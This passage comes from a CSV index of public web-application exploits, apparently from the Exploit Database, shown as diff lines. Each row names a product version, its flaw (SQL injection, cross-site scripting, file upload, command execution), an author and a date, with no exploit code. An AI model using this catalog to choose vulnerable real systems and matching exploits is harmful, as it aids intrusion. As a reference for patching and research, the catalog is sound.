7.0 < 7.31 - SQL Injection (2)",2014-10-17,"Claudio Viviani",webapps,php, +34993,exploits/php/webapps/34993.php,"Drupal 7.32 - SQL Injection (PHP)",2014-10-17,"Dustin Dörr",webapps,php, +35004,exploits/php/webapps/35004.txt,"CompactCMS 1.4.1 - Multiple Cross-Site Scripting Vulnerabilities (1)",2010-11-18,"High-Tech Bridge SA",webapps,php, +35008,exploits/cgi/webapps/35008.txt,"Hot Links SQL 3.2 - 'report.cgi' SQL Injection",2010-11-22,"Aliaksandr Hartsuyeu",webapps,cgi, +35012,exploits/multiple/webapps/35012.txt,"ZYXEL P-660R-T1 V2 - 'HomeCurrent_Date' Cross-Site Scripting",2010-11-23,"Usman Saeed",webapps,multiple, +35015,exploits/cgi/webapps/35015.txt,"SimpLISTic SQL 2.0 - 'email.cgi' Cross-Site Scripting",2010-11-24,"Aliaksandr Hartsuyeu",webapps,cgi, +35016,exploits/php/webapps/35016.txt,"Easy Banner 2009.05.18 - '/member.php' Multiple SQL Injection / Authentication Bypass",2010-11-26,"Aliaksandr Hartsuyeu",webapps,php, +35017,exploits/php/webapps/35017.txt,"Easy Banner 2009.05.18 - 'index.php' Multiple Cross-Site Scripting Vulnerabilities",2010-11-26,"Aliaksandr Hartsuyeu",webapps,php, +35025,exploits/php/webapps/35025.html,"Car Portal 2.0 - 'car_make' Cross-Site Scripting",2010-11-29,"Underground Stockholm",webapps,php, +35026,exploits/php/webapps/35026.txt,"Joomla! Component com_storedirectory - 'id' SQL Injection",2010-11-30,XroGuE,webapps,php, +35027,exploits/php/webapps/35027.txt,"E-lokaler CMS 2 - Admin Login Multiple SQL Injections",2010-11-26,ali_err0r,webapps,php, +35028,exploits/php/webapps/35028.txt,"SmartBox - 'page_id' SQL Injection",2010-11-26,KnocKout,webapps,php, +35031,exploits/asp/webapps/35031.txt,"BugTracker.NET 3.4.4 - SQL Injection / Cross-Site Scripting",2010-11-30,BugTracker.NET,webapps,asp, +35035,exploits/cgi/webapps/35035.txt,"AWStats 6.x - Apache Tomcat Configuration File Arbitrary Command Execution",2010-11-30,StenoPlasma,webapps,cgi, +35036,exploits/php/webapps/35036.txt,"Joomla! Component Annuaire - 'index.php?id' SQL Injection",2010-12-02,"Ashiyane Digital Security Team",webapps,php, +35037,exploits/ios/webapps/35037.txt,"iFunBox Free 1.1 iOS - Local File Inclusion",2014-10-22,Vulnerability-Lab,webapps,ios,8000 +35038,exploits/ios/webapps/35038.txt,"File Manager 4.2.10 iOS - Code Execution",2014-10-22,Vulnerability-Lab,webapps,ios,80 +35039,exploits/windows/webapps/35039.rb,"DotNetNuke DNNspot Store 3.0.0 - Arbitrary File Upload (Metasploit)",2014-10-22,"Glafkos Charalambous",webapps,windows, +35041,exploits/php/webapps/35041.py,"Feng Office 1.7.4 - Arbitrary File Upload",2014-10-23,"AutoSec Tools",webapps,php, +35042,exploits/php/webapps/35042.txt,"Feng Office 1.7.4 - Cross-Site Scripting",2014-10-23,"AutoSec Tools",webapps,php, +35043,exploits/php/webapps/35043.txt,"Contenido CMS 4.8.12 - Multiple Cross-Site Scripting Vulnerabilities",2010-12-02,"High-Tech Bridge SA",webapps,php, +35044,exploits/php/webapps/35044.txt,"Alguest 1.1 - Multiple Cookie Authentication Bypass Vulnerabilities",2010-12-03,"Aliaksandr Hartsuyeu",webapps,php, +35045,exploits/asp/webapps/35045.txt,"DotNetNuke 5.5.1 - 'InstallWizard.aspx' Cross-Site Scripting",2010-12-03,"Richard Brain",webapps,asp, +35046,exploits/php/webapps/35046.txt,"Axway Secure Transport 5.1 SP2 - Arbitrary File Upload (via Cross-Site Request Forgery)",2014-10-23,"Emmanuel Law",webapps,php, +35047,exploits/hardware/webapps/35047.txt,"Dell SonicWALL Gms 7.2.x - Code Injection",2014-10-23,Vulnerability-Lab,webapps,hardware, +35048,exploits/asp/webapps/35048.txt,"Techno Dreams Articles & Papers Package 2.0 - 'ArticlesTablelist.asp' SQL Injection",2010-12-04,R4dc0re,webapps,asp, +35049,exploits/asp/webapps/35049.txt,"Techno Dreams FAQ Manager Package 1.0 - 'faqlist.asp' SQL Injection",2010-12-04,R4dc0re,webapps,asp, +35050,exploits/php/webapps/35050.txt,"Alguest 1.1 - 'start' SQL Injection",2010-12-06,"Aliaksandr Hartsuyeu",webapps,php, +35052,exploits/php/webapps/35052.txt,"Magento Server MAGMI Plugin 0.7.17a - Remote File Inclusion",2014-10-25,"Parvinder Bhasin",webapps,php, +35566,exploits/php/webapps/35566.txt,"Yaws-Wiki 1.88-1 - Multiple Cross-Site Scripting / HTML Injection Vulnerabilities",2011-04-04,"Michael Brooks",webapps,php, +35056,exploits/hardware/webapps/35056.txt,"Dell EqualLogic Storage - Directory Traversal",2014-10-25,"XLabs Security",webapps,hardware, +35057,exploits/php/webapps/35057.py,"WordPress Plugin 0.9.7 / Joomla! Component 2.0.0 Creative Contact Form - Arbitrary File Upload",2014-10-25,"Claudio Viviani",webapps,php, +35127,exploits/jsp/webapps/35127.txt,"Progress OpenEdge 11.2 - Directory Traversal",2014-10-31,"XLabs Security",webapps,jsp,9090 +35060,exploits/php/webapps/35060.txt,"Aigaion 1.3.4 - 'ID' SQL Injection",2010-12-07,KnocKout,webapps,php, +35063,exploits/php/webapps/35063.txt,"Zimplit CMS - 'zimplit.php?File' Cross-Site Scripting",2010-12-07,"High-Tech Bridge SA",webapps,php, +35064,exploits/php/webapps/35064.txt,"Zimplit CMS - 'English_manual_version_2.php?client' Cross-Site Scripting",2010-12-07,"High-Tech Bridge SA",webapps,php, +35065,exploits/asp/webapps/35065.txt,"SolarWinds Orion Network Performance Monitor (NPM) 10.1 - Multiple Cross-Site Scripting Vulnerabilities",2010-12-07,x0skel,webapps,asp, +35066,exploits/php/webapps/35066.txt,"WordPress Plugin Processing Embed 0.5 - 'pluginurl' Cross-Site Scripting",2010-12-08,"John Leitch",webapps,php, +35067,exploits/php/webapps/35067.txt,"WordPress Plugin Safe Search - 'v1' Cross-Site Scripting",2010-12-08,"John Leitch",webapps,php, +35072,exploits/php/webapps/35072.txt,"Drupal Module Embedded Media Field/Media 6.x : Video Flotsam/Media: Audio Flotsam - Multiple Vulnerabilities",2010-12-08,"Justin Klein Keane",webapps,php, +35073,exploits/php/webapps/35073.txt,"WordPress Plugin CP Multi View Event Calendar 1.01 - SQL Injection",2014-10-27,"Claudio Viviani",webapps,php,80 +35075,exploits/hardware/webapps/35075.txt,"CBN CH6640E/CG6640E Wireless Gateway Series - Multiple Vulnerabilities",2014-10-27,LiquidWorm,webapps,hardware, +35076,exploits/multiple/webapps/35076.py,"HP Operations Agent - Cross-Site Scripting iFrame Injection",2014-10-27,"Matt Schmidt",webapps,multiple,383 +35079,exploits/jsp/webapps/35079.txt,"Mulesoft ESB Runtime 3.5.1 - Privilege Escalation",2014-10-27,"Brandon Perry",webapps,jsp,8585 +35080,exploits/php/webapps/35080.pl,"Incredible PBX 2.0.6.5.0 - Remote Command Execution",2014-10-27,"Simo Ben Youssef",webapps,php,80 +40333,exploits/php/webapps/40333.txt,"WordPress Plugin RB Agency 2.4.7 - Local File Disclosure",2016-09-05,"Persian Hack Team",webapps,php,80 +35082,exploits/ios/webapps/35082.txt,"WebDisk+ 2.1 iOS - Code Execution",2014-10-27,Vulnerability-Lab,webapps,ios,1861 +35083,exploits/ios/webapps/35083.txt,"Folder Plus 2.5.1 iOS - Persistent Cross-Site Scripting",2014-10-27,Vulnerability-Lab,webapps,ios, +35084,exploits/php/webapps/35084.txt,"WordPress Plugin Twitter Feed - 'url' Cross-Site Scripting",2010-12-07,"John Leitch",webapps,php, +35085,exploits/cgi/webapps/35085.txt,"WWWThread 5.0.8 Pro - 'showflat.pl' Cross-Site Scripting",2010-12-09,"Aliaksandr Hartsuyeu",webapps,cgi, +35087,exploits/php/webapps/35087.txt,"net2ftp 0.98 (stable) - '/admin1.template.php' Local/Remote File Inclusion",2010-12-09,"Marcin Ressel",webapps,php, +35088,exploits/php/webapps/35088.txt,"PHP State - 'id' SQL Injection",2010-12-09,jos_ali_joe,webapps,php, +35089,exploits/php/webapps/35089.txt,"Joomla! Component Jeformcr - 'id' SQL Injection",2010-12-09,FL0RiX,webapps,php, +35090,exploits/php/webapps/35090.txt,"Joomla! Component JExtensions Property Finder - 'sf_id' SQL Injection",2010-12-10,FL0RiX,webapps,php, +35091,exploits/php/webapps/35091.txt,"ManageEngine EventLog Analyzer 6.1 - Multiple Cross-Site Scripting Vulnerabilities",2010-12-10,"Rob Kraus",webapps,php, +35093,exploits/cgi/webapps/35093.txt,"BizDir 05.10 - 'f_srch' Cross-Site Scripting",2010-12-10,"Aliaksandr Hartsuyeu",webapps,cgi, +35094,exploits/php/webapps/35094.txt,"slickMsg 0.7-alpha - 'top.php' Cross-Site Scripting",2010-12-10,"Aliaksandr Hartsuyeu",webapps,php, +35096,exploits/php/webapps/35096.txt,"Joomla! Component com_mailto - Multiple Cross-Site Scripting Vulnerabilities",2010-12-10,MustLive,webapps,php, +35097,exploits/php/webapps/35097.txt,"Joomla! Component com_redirect 1.5.19 - Local File Inclusion",2010-12-13,jos_ali_joe,webapps,php, +35098,exploits/php/webapps/35098.txt,"Enalean Tuleap 7.4.99.5 - Blind SQL Injection",2014-10-28,Portcullis,webapps,php,80 +35099,exploits/php/webapps/35099.txt,"Enalean Tuleap 7.2 - XML External Entity File Disclosure",2014-10-28,Portcullis,webapps,php,80 +35100,exploits/php/webapps/35100.txt,"Enalean Tuleap 7.4.99.5 - Remote Command Execution",2014-10-28,Portcullis,webapps,php,80 +35102,exploits/php/webapps/35102.py,"Tapatalk for vBulletin 4.x - Unauthenticated Blind SQL Injection",2014-10-28,tintinweb,webapps,php,80 +35214,exploits/multiple/webapps/35214.txt,"Subex Fms 7.4 - Unauthenticated SQL Injection",2014-11-11,"Anastasios Monachos",webapps,multiple, +35209,exploits/jsp/webapps/35209.txt,"ManageEngine OpManager / Social IT Plus / IT360 - Multiple Vulnerabilities",2014-11-10,"Pedro Ribeiro",webapps,jsp, +35106,exploits/php/webapps/35106.txt,"Cetera eCommerce - 'banner.php' Cross-Site Scripting",2010-12-11,MustLive,webapps,php, +35107,exploits/cfm/webapps/35107.txt,"Mura CMS - Multiple Cross-Site Scripting Vulnerabilities",2010-12-13,"Richard Brain",webapps,cfm, +35108,exploits/php/webapps/35108.txt,"MyBB 1.4.10 - 'tags.php' Cross-Site Scripting",2010-12-12,TEAMELITE,webapps,php, +35109,exploits/php/webapps/35109.txt,"PHP TopSites 2.1 - '/rate.php' Cross-Site Scripting / SQL Injection",2010-12-13,"c0de Hunters",webapps,php, +35110,exploits/php/webapps/35110.txt,"BlogCFC 5.9.6.001 - Multiple Cross-Site Scripting Vulnerabilities",2010-12-14,"Richard Brain",webapps,php, +35111,exploits/php/webapps/35111.txt,"slickMsg - Cross-Site Scripting / HTML Injection",2010-12-15,"Aliaksandr Hartsuyeu",webapps,php, +35113,exploits/php/webapps/35113.php,"MAARCH 1.4 - Arbitrary File Upload",2014-10-29,"Adrien Thierry",webapps,php,80 +35114,exploits/php/webapps/35114.txt,"MAARCH 1.4 - SQL Injection",2014-10-29,"Adrien Thierry",webapps,php,80 +35116,exploits/php/webapps/35116.txt,"HP Insight Diagnostics Online Edition 8.4 - 'search.php' Cross-Site Scripting",2010-12-15,"Richard Brain",webapps,php, +35117,exploits/php/webapps/35117.txt,"Blog:CMS 4.2.1 e - Multiple HTML Injections / Cross-Site Scripting",2010-12-15,"High-Tech Bridge SA",webapps,php, +35118,exploits/php/webapps/35118.txt,"PHPRS - 'model-kits.php' SQL Injection",2010-12-16,KnocKout,webapps,php, +35120,exploits/php/webapps/35120.txt,"Radius Manager 3.6 - Multiple Cross-Site Scripting Vulnerabilities",2010-12-17,"Rodrigo Rubira Branco",webapps,php, +35121,exploits/php/webapps/35121.txt,"Social Share - Multiple Cross-Site Scripting Vulnerabilities",2010-12-17,"Aliaksandr Hartsuyeu",webapps,php, +35122,exploits/php/webapps/35122.txt,"Social Share - 'postid' SQL Injection",2010-12-20,"Aliaksandr Hartsuyeu",webapps,php, +35123,exploits/php/webapps/35123.txt,"Mafya Oyun Scrpti - 'profil.php' SQL Injection",2010-12-20,"DeadLy DeMon",webapps,php, +35124,exploits/php/webapps/35124.txt,"FreeNAS 0.7.2.5543 - 'index.php' Multiple Cross-Site Scripting Vulnerabilities",2010-12-21,db.pub.mail,webapps,php, +35125,exploits/php/webapps/35125.txt,"OpenFiler - 'device' Cross-Site Scripting",2010-12-21,db.pub.mail,webapps,php, +35126,exploits/php/webapps/35126.txt,"Habari 0.6.5 - Multiple Cross-Site Scripting Vulnerabilities",2010-12-21,"High-Tech Bridge SA",webapps,php, +35128,exploits/hardware/webapps/35128.txt,"ZTE Modem ZXDSL 531BIIV7.3.0f_D09_IN - Persistent Cross-Site Scripting",2014-10-31,"Ravi Rajput",webapps,hardware, +35129,exploits/php/webapps/35129.txt,"Who's Who Script - Cross-Site Request Forgery (Add Admin)",2014-10-31,"ZoRLu Bugrahan",webapps,php, +35131,exploits/php/webapps/35131.txt,"Social Share - 'Username' SQL Injection",2010-12-21,"Aliaksandr Hartsuyeu",webapps,php, +35133,exploits/php/webapps/35133.txt,"WordPress Plugin Mediatricks Viva Thumbs - Multiple Information Disclosure Vulnerabilities",2010-12-21,"Richard Brain",webapps,php, +35134,exploits/php/webapps/35134.txt,"ImpressCMS 1.2.x - 'quicksearch_ContentContent' HTML Injection",2010-12-21,"High-Tech Bridge SA",webapps,php, +35135,exploits/php/webapps/35135.txt,"Joomla! Component Classified - SQL Injection",2010-12-22,R4dc0re,webapps,php, +35136,exploits/php/webapps/35136.txt,"WordPress Plugin Accept Signups 0.1 - 'email' Cross-Site Scripting",2010-12-22,clshack,webapps,php, +35137,exploits/php/webapps/35137.txt,"Social Share - 'vote.php' HTTP Response Splitting",2010-12-10,"Aliaksandr Hartsuyeu",webapps,php, +35138,exploits/php/webapps/35138.txt,"Esotalk CMS 1.0.0g4 - Cross-Site Scripting",2014-11-02,evi1m0,webapps,php, +35212,exploits/php/webapps/35212.txt,"WordPress Plugin / Joomla! Component XCloner - Multiple Vulnerabilities",2014-11-10,"Larry W. Cashdollar",webapps,php,80 +35140,exploits/php/webapps/35140.txt,"MyBB 1.6 - 'search.php?keywords' SQL Injection",2010-12-23,"Aung Khant",webapps,php, +35141,exploits/php/webapps/35141.txt,"MyBB 1.6 - 'private.php?keywords' SQL Injection",2010-12-23,"Aung Khant",webapps,php, +35142,exploits/php/webapps/35142.txt,"Social Share - 'search' Cross-Site Scripting",2010-12-23,"Aliaksandr Hartsuyeu",webapps,php, +35143,exploits/php/webapps/35143.txt,"HotWeb Scripts HotWeb Rentals - 'PageId' SQL Injection",2010-12-28,"non customers",webapps,php, +35145,exploits/php/webapps/35145.txt,"Pligg CMS 1.1.3 - 'range' SQL Injection",2010-12-27,Dr.NeT,webapps,php, +35146,exploits/php/webapps/35146.txt,"PHP < 5.6.2 - 'disable_functions()' Bypass Command Injection (Shellshock)",2014-11-03,"Ryan King (Starfall)",webapps,php, +35149,exploits/php/webapps/35149.txt,"LiveZilla 3.2.0.2 - 'Track' Module 'server.php' Cross-Site Scripting",2010-12-27,"Ulisses Castro",webapps,php, +35150,exploits/php/webapps/35150.php,"Drupal < 7.32 - Unauthenticated SQL Injection",2014-11-03,"Stefan Horst",webapps,php,443 +35155,exploits/php/webapps/35155.txt,"CruxCMS 3.0 - Multiple Input Validation Vulnerabilities",2010-12-26,ToXiC,webapps,php, +35156,exploits/php/webapps/35156.txt,"Coppermine Photo Gallery 1.5.10 - 'help.php' Cross-Site Scripting",2010-12-28,waraxe,webapps,php, +35157,exploits/php/webapps/35157.html,"Coppermine Photo Gallery 1.5.10 - 'searchnew.php' Cross-Site Scripting",2010-12-28,waraxe,webapps,php, +35159,exploits/php/webapps/35159.txt,"MODx CMS 2.2.14 - Cross-Site Request Forgery Bypass / Reflected Cross-Site Scripting / Persistent Cross-Site Scripting",2014-11-05,"Narendra Bhati",webapps,php, +35160,exploits/php/webapps/35160.txt,"Mouse Media Script 1.6 - Persistent Cross-Site Scripting",2014-11-05,"Halil Dalabasmaz",webapps,php, +35165,exploits/php/webapps/35165.txt,"WikLink 0.1.3 - 'getURL.php' SQL Injection",2011-01-05,"Aliaksandr Hartsuyeu",webapps,php, +35167,exploits/php/webapps/35167.txt,"Joomla! 1.0.x - 'ordering' Cross-Site Scripting",2011-01-06,"Aung Khant",webapps,php, +35168,exploits/asp/webapps/35168.txt,"BlogEngine.NET 1.6 - Directory Traversal / Information Disclosure",2011-01-05,"Deniz Cevik",webapps,asp, +35169,exploits/jsp/webapps/35169.txt,"Openfire 3.6.4 - Multiple Cross-Site Scripting Vulnerabilities",2011-01-05,"Walikar Riyaz Ahemed Dawalmalik",webapps,jsp, +35172,exploits/php/webapps/35172.txt,"PHP MicroCMS 1.0.1 - 'page_text' Cross-Site Scripting",2011-01-06,"High-Tech Bridge SA",webapps,php, +35181,exploits/jsp/webapps/35181.txt,"Symantec Endpoint Protection 12.1.4023.4080 - Multiple Vulnerabilities",2014-11-06,"SEC Consult",webapps,jsp, +35185,exploits/php/webapps/35185.txt,"WonderCMS 0.3.3 - 'editText.php' Cross-Site Scripting",2011-01-04,"High-Tech Bridge SA",webapps,php, +35186,exploits/php/webapps/35186.txt,"WikLink 0.1.3 - Multiple SQL Injections",2011-01-10,"Aliaksandr Hartsuyeu",webapps,php, +35187,exploits/php/webapps/35187.txt,"Joostina 1.3 - 'index.php' Cross-Site Scripting",2011-01-08,MustLive,webapps,php, +35191,exploits/php/webapps/35191.txt,"CMS Tovar - 'tovar.php' SQL Injection",2011-01-11,jos_ali_joe,webapps,php, +35193,exploits/php/webapps/35193.txt,"vldPersonals 2.7 - Multiple Vulnerabilities",2014-11-10,"Mr T",webapps,php, +35197,exploits/php/webapps/35197.txt,"Serenity Client Management Portal 1.0.1 - Multiple Vulnerabilities",2014-11-10,"Halil Dalabasmaz",webapps,php, +35198,exploits/php/webapps/35198.txt,"phpSound Music Sharing Platform 1.0.5 - Multiple Cross-Site Scripting Vulnerabilities",2014-11-10,"Halil Dalabasmaz",webapps,php, +35210,exploits/multiple/webapps/35210.txt,"Password Manager Pro / Pro MSP - Blind SQL Injection",2014-11-10,"Pedro Ribeiro",webapps,multiple, +35203,exploits/hardware/webapps/35203.txt,"ZTE ZXDSL 831CII - Insecure Direct Object Reference",2014-11-10,"Paulos Yibelo",webapps,hardware, +35204,exploits/php/webapps/35204.txt,"WordPress Plugin Another WordPress Classifieds Plugin - SQL Injection",2014-11-10,dill,webapps,php, +35206,exploits/php/webapps/35206.txt,"PHP-Fusion 7.02.07 - SQL Injection",2014-11-10,"XLabs Security",webapps,php, +35313,exploits/php/webapps/35313.txt,"WordPress Plugin SP Client Document Manager 2.4.1 - SQL Injection",2014-11-21,"ITAS Team",webapps,php,80 +35208,exploits/hardware/webapps/35208.txt,"Barracuda - Multiple Unauthentication Logfile Downloads",2014-11-10,4CKnowLedge,webapps,hardware, +35292,exploits/php/webapps/35292.html,"vBSEO 3.2.2/3.5.2 - Multiple Cross-Site Scripting Vulnerabilities",2011-01-30,MaXe,webapps,php, +35291,exploits/php/webapps/35291.txt,"Vanilla Forums 2.0.16 - 'Target' Cross-Site Scripting",2011-01-27,"YGN Ethical Hacker Group",webapps,php, +35295,exploits/php/webapps/35295.txt,"Joomla! Component com_frontenduseraccess - Local File Inclusion",2011-02-01,wishnusakti,webapps,php, +35296,exploits/php/webapps/35296.txt,"eSyndiCat Directory Software 2.2/2.3 - 'preview' Cross-Site Scripting",2011-01-30,"Avram Marius",webapps,php, +35297,exploits/php/webapps/35297.txt,"Moodle 2.0.1 - 'PHPCOVERAGE_HOME' Cross-Site Scripting",2011-02-01,"AutoSec Tools",webapps,php, +35298,exploits/php/webapps/35298.txt,"TinyWebGallery 1.8.3 - Cross-Site Scripting / Local File Inclusion",2011-02-01,"Yam Mesicka",webapps,php, +35221,exploits/php/webapps/35221.txt,"Piwigo 2.6.0 - 'picture.php?rate' SQL Injection",2014-11-13,"Manuel García Cárdenas",webapps,php,80 +35218,exploits/php/webapps/35218.txt,"WordPress Plugin SupportEzzy Ticket System 1.2.5 - Persistent Cross-Site Scripting",2014-11-12,"Halil Dalabasmaz",webapps,php,80 +35219,exploits/multiple/webapps/35219.txt,"Proticaret E-Commerce Script 3.0 - SQL Injection (1)",2014-11-13,"Onur Alanbel (BGA)",webapps,multiple, +35220,exploits/multiple/webapps/35220.txt,"Joomla! Component com_hdflvplayer < 2.1.0.1 - SQL Injection",2014-11-13,"Claudio Viviani",webapps,multiple, +35222,exploits/jsp/webapps/35222.txt,"F5 BIG-IP 10.1.0 - Directory Traversal",2014-11-13,"Anastasios Monachos",webapps,jsp, +35223,exploits/php/webapps/35223.txt,"Digi Online Examination System 2.0 - Unrestricted Arbitrary File Upload",2014-11-13,"Halil Dalabasmaz",webapps,php,80 +35224,exploits/php/webapps/35224.txt,"MyBB 1.8.x - Multiple Vulnerabilities",2014-11-13,smash,webapps,php,80 +35227,exploits/php/webapps/35227.txt,"Alguest 1.1c-patched - 'elimina' SQL Injection",2011-01-14,"Aliaksandr Hartsuyeu",webapps,php, +35228,exploits/php/webapps/35228.txt,"CompactCMS 1.4.1 - Multiple Cross-Site Scripting Vulnerabilities (2)",2011-01-15,"Patrick de Brouwer",webapps,php, +35231,exploits/php/webapps/35231.txt,"Advanced Webhost Billing System (AWBS) 2.9.2 - 'oid' SQL Injection",2011-01-16,ShivX,webapps,php, +35233,exploits/multiple/webapps/35233.txt,"B-Cumulus - 'tagcloud' Multiple Cross-Site Scripting Vulnerabilities",2011-01-18,MustLive,webapps,multiple, +35237,exploits/multiple/webapps/35237.txt,"Gogs - 'label' SQL Injection",2014-11-14,"Timo Schmid",webapps,multiple,80 +35238,exploits/multiple/webapps/35238.txt,"Gogs - 'users'/'repos' '?q' SQL Injection",2014-11-14,"Timo Schmid",webapps,multiple, +35239,exploits/php/webapps/35239.txt,"phpCMS 2008 V2 - 'data.php' SQL Injection",2011-01-17,R3d-D3V!L,webapps,php, +35245,exploits/php/webapps/35245.txt,"PHPAuctions - 'viewfaqs.php' SQL Injection",2011-01-19,"BorN To K!LL",webapps,php, +35246,exploits/php/webapps/35246.py,"Joomla! Component com_hdflvplayer < 2.1.0.1 - Arbitrary File Download",2014-11-15,"Claudio Viviani",webapps,php, +35248,exploits/multiple/webapps/35248.txt,"clientResponse Client Management 4.1 - Cross-Site Scripting",2014-11-15,"Halil Dalabasmaz",webapps,multiple, +35293,exploits/php/webapps/35293.txt,"Joomla! Component com_virtuemart 1.1.6 - SQL Injection",2011-01-31,"Andrea Fabrizi",webapps,php, +35288,exploits/php/webapps/35288.txt,"WordPress Plugin oQey-Gallery 0.2 - 'tbpv_domain' Cross-Site Scripting",2011-01-24,"AutoSec Tools",webapps,php, +35289,exploits/php/webapps/35289.txt,"WordPress Plugin FCChat Widget 2.1.7 - 'path' Cross-Site Scripting",2011-01-25,"AutoSec Tools",webapps,php, +35290,exploits/php/webapps/35290.txt,"SimpGB 1.49.2 - 'Guestbook.php' Multiple Cross-Site Scripting Vulnerabilities",2011-01-26,MustLive,webapps,php, +35251,exploits/php/webapps/35251.txt,"Pixie CMS 1.0.4 - '/admin/index.php' SQL Injection",2011-01-20,"High-Tech Bridge SA",webapps,php, +35253,exploits/php/webapps/35253.txt,"web@all 1.1 - 'url' Cross-Site Scripting",2011-01-25,"AutoSec Tools",webapps,php, +35254,exploits/php/webapps/35254.txt,"PivotX 2.2.2 - 'module_image.php' Cross-Site Scripting",2011-01-25,"AutoSec Tools",webapps,php, +35255,exploits/php/webapps/35255.txt,"WordPress Plugin Uploader 1.0 - 'num' Cross-Site Scripting",2011-01-24,"AutoSec Tools",webapps,php, +35256,exploits/cfm/webapps/35256.txt,"ActiveWeb Professional 3.0 - Arbitrary File Upload",2011-01-25,StenoPlasma,webapps,cfm, +35257,exploits/php/webapps/35257.txt,"WordPress Plugin Videox7 UGC 2.5.3.2 - 'listid' Cross-Site Scripting",2011-01-25,"AutoSec Tools",webapps,php, +35258,exploits/php/webapps/35258.txt,"WordPress Plugin Audio 0.5.1 - 'showfile' Cross-Site Scripting",2011-01-23,"AutoSec Tools",webapps,php, +35259,exploits/php/webapps/35259.txt,"PivotX 2.2 - '/pivotx/includes/blogroll.php?color' Cross-Site Scripting",2011-01-25,"High-Tech Bridge SA",webapps,php, +35260,exploits/php/webapps/35260.txt,"PivotX 2.2 - '/pivotx/includes/timwrapper.php?src' Cross-Site Scripting",2011-01-25,"High-Tech Bridge SA",webapps,php, +35261,exploits/php/webapps/35261.txt,"WordPress Plugin RSS Feed Reader 0.1 - 'rss_url' Cross-Site Scripting",2011-01-23,"AutoSec Tools",webapps,php, +35262,exploits/php/webapps/35262.txt,"WordPress Plugin WP Featured Post with Thumbnail 3.0 - 'src' Cross-Site Scripting",2011-01-23,"AutoSec Tools",webapps,php, +35263,exploits/php/webapps/35263.txt,"WordPress Plugin WP Publication Archive 2.0.1 - 'file' Information Disclosure",2011-01-23,"AutoSec Tools",webapps,php, +35264,exploits/php/webapps/35264.txt,"WordPress Plugin Featured Content 0.0.1 - 'listid' Cross-Site Scripting",2011-01-25,"AutoSec Tools",webapps,php, +35265,exploits/php/webapps/35265.php,"WordPress Plugin Recip.ly 1.1.7 - 'uploadImage.php' Arbitrary File Upload",2011-01-25,"AutoSec Tools",webapps,php, +35266,exploits/php/webapps/35266.txt,"MyBB Forums 1.8.2 - Persistent Cross-Site Scripting",2014-11-17,"Avinash Thapa",webapps,php, +35272,exploits/hardware/webapps/35272.txt,"ZTE ZXHN H108L - Authentication Bypass (1)",2014-11-17,"Project Zero Labs",webapps,hardware, +35271,exploits/php/webapps/35271.txt,"Maarch LetterBox 2.8 - (Authentication Bypass) Insecure Cookies",2014-11-17,"ZoRLu Bugrahan",webapps,php, +35285,exploits/php/webapps/35285.txt,"WordPress Plugin Feature Slideshow 1.0.6 - 'src' Cross-Site Scripting",2011-01-24,"AutoSec Tools",webapps,php, +35286,exploits/php/webapps/35286.txt,"WordPress Plugin BezahlCode Generator 1.0 - 'gen_name' Cross-Site Scripting",2011-01-25,"AutoSec Tools",webapps,php, +35287,exploits/php/webapps/35287.txt,"WordPress Plugin Powerhouse Museum Collection Image Grid 0.9.1.1 - 'tbpv_username' Cross-Site Scripting",2011-01-24,"AutoSec Tools",webapps,php, +35274,exploits/php/webapps/35274.txt,"PHPFox - Persistent Cross-Site Scripting",2014-11-17,spyk2r,webapps,php,80 +35275,exploits/xml/webapps/35275.txt,"Proticaret E-Commerce Script 3.0 - SQL Injection (2)",2014-11-17,"BGA Security",webapps,xml,80 +35276,exploits/hardware/webapps/35276.txt,"ZTE ZXHN H108L - Authentication Bypass (2)",2014-11-17,"Project Zero Labs",webapps,hardware,80 +35277,exploits/php/webapps/35277.txt,"WebsiteBaker 2.8.3 - Multiple Vulnerabilities",2014-11-17,"Manuel García Cárdenas",webapps,php,80 +35278,exploits/php/webapps/35278.txt,"Zoph 0.9.1 - Multiple Vulnerabilities",2014-11-17,"Manuel García Cárdenas",webapps,php,80 +35294,exploits/php/webapps/35294.txt,"Joomla! Component com_clan_members - 'id' SQL Injection",2011-02-01,FL0RiX,webapps,php, +35300,exploits/php/webapps/35300.txt,"WordPress Plugin TagNinja 1.0 - 'id' Cross-Site Scripting",2011-02-01,"AutoSec Tools",webapps,php, +35301,exploits/php/webapps/35301.html,"Snowfox CMS 1.0 - Cross-Site Request Forgery (Add Admin)",2014-11-19,LiquidWorm,webapps,php,80 +35303,exploits/php/webapps/35303.txt,"WordPress Plugin Paid Memberships Pro 1.7.14.2 - Directory Traversal",2014-11-19,"Kacper Szurek",webapps,php,80 +35305,exploits/php/webapps/35305.txt,"ACollab - 't' SQL Injection",2011-02-01,"AutoSec Tools",webapps,php, +35306,exploits/php/webapps/35306.txt,"TCExam 11.1.16 - 'user_password' Cross-Site Scripting",2011-02-02,"AutoSec Tools",webapps,php, +35307,exploits/php/webapps/35307.py,"All In One Control Panel 1.4.1 - 'cp_menu_data_file.php' SQL Injection",2011-01-31,"AutoSec Tools",webapps,php, +35309,exploits/php/webapps/35309.txt,"Betsy 4.0 - 'page' Local File Inclusion",2011-02-02,MizoZ,webapps,php, +35310,exploits/asp/webapps/35310.txt,"Web Wiz Forums 9.5 - Multiple SQL Injections",2011-03-23,eXeSoul,webapps,asp, +35311,exploits/php/webapps/35311.txt,"Octeth Oempro 3.6.4 - SQL Injection / Information Disclosure",2011-02-03,"Ignacio Garrido",webapps,php, +35312,exploits/php/webapps/35312.txt,"Firebook - 'index.html' Cross-Site Scripting",2011-02-03,MustLive,webapps,php, +35567,exploits/php/webapps/35567.txt,"Eleanor CMS - Cross-Site Scripting / Multiple SQL Injections",2011-04-05,"High-Tech Bridge SA",webapps,php, +35568,exploits/php/webapps/35568.txt,"UseBB 1.0.11 - 'admin.php' Local File Inclusion",2011-04-05,"High-Tech Bridge SA",webapps,php, +35315,exploits/php/webapps/35315.txt,"Escortservice 1.0 - 'custid' SQL Injection",2011-02-07,NoNameMT,webapps,php, +35319,exploits/php/webapps/35319.txt,"WebAsyst Shop-Script - Cross-Site Scripting / HTML Injection",2011-02-08,"High-Tech Bridge SA",webapps,php, +35320,exploits/php/webapps/35320.txt,"ViArt Shop 4.0.5 - Multiple Cross-Site Scripting Vulnerabilities",2011-02-08,"High-Tech Bridge SA",webapps,php, +35381,exploits/php/webapps/35381.txt,"xEpan 1.0.1 - Cross-Site Request Forgery",2014-11-26,"High-Tech Bridge SA",webapps,php,80 +35323,exploits/php/webapps/35323.md,"MyBB 1.8.2 - 'unset_globals()' Function Bypass / Remote Code 